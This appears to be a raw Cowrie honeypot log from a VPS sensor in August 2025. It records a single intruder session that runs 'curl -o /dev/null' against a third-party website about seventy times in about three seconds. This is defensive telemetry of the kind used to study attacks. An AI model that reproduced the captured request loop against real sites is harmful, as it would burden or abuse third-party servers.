{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.445244Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.499222Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.500258Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.547712Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.548698Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.585842Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.587050Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.623659Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.624637Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.661471Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.662356Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.703329Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.704980Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.742477Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.743343Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.779490Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.780329Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.817096Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.817944Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.854730Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.855567Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.894322Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.895217Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.942833Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.943771Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.980415Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.981479Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.022015Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.023049Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.060447Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.061416Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.100025Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.100995Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.138361Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.139564Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.176610Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.177480Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.221316Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.222259Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.259757Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.261007Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.297782Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.298783Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.345997Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.346957Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.384553Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.385452Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.425351Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.426329Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.463075Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.463956Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.501437Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.502402Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.539428Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.540357Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.577125Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.578037Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.618281Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.619269Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.656985Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.657959Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.695382Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.696629Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.759964Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.760931Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.798564Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.799577Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.838745Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.840103Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.890625Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.891897Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.944761Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.945696Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:21.983812Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:21.984776Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.032453Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.033340Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.072219Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.073127Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.117656Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.118692Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.158883Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.159985Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.207113Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.208207Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.245652Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.246687Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.285745Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.286577Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.323725Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.325099Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.362446Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.363497Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.400298Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.401255Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.437648Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.439103Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.476557Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.477524Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.514798Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.515761Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.552786Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.553806Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.602957Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.603955Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.643347Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.644352Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.686148Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.687150Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.726365Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.727402Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.764854Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.765835Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.802892Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.803949Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.841660Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.842692Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.879051Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.880311Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.917638Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.918635Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:22.956051Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:22.957044Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.004423Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.005745Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.042599Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.043544Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.080498Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.081414Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.118339Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
